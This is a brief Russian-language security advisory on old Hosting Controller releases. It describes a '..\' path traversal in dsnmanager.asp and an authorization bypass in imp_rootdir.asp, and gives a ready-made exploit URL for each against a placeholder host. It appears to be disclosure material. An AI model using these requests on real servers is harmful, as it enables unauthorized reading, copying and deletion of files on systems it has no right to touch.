Hosting Controller — приложение, которое централизует все задачи хостинга. 

1. Добавляя последовательность символов ‘..\’ к DSNAction в dsnmanager.asp, можно получить доступ к произвольным файлам на диске:

http://www.target.com/admin/dsn/dsnmanager.asp?DSNAction= ChangeRoot&RootName=D:\webspace\opendnsserver\target\target.com\db\..\..\..\..\ 

2. Любой пользователь может обойти авторизацию и получить полный контроль над любым файлом в системе. Уязвимость находится в файле /import/imp_rootdir.asp, который позволяет любому пользователю копировать, удалять файлы и папки в системе:

http://www.target.com/admin/import/imp_rootdir.asp?result= 1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\ 

Уязвимость обнаружена в в Hosting Controller 1.4.2- v.2002 Beta2.

Оставить мнение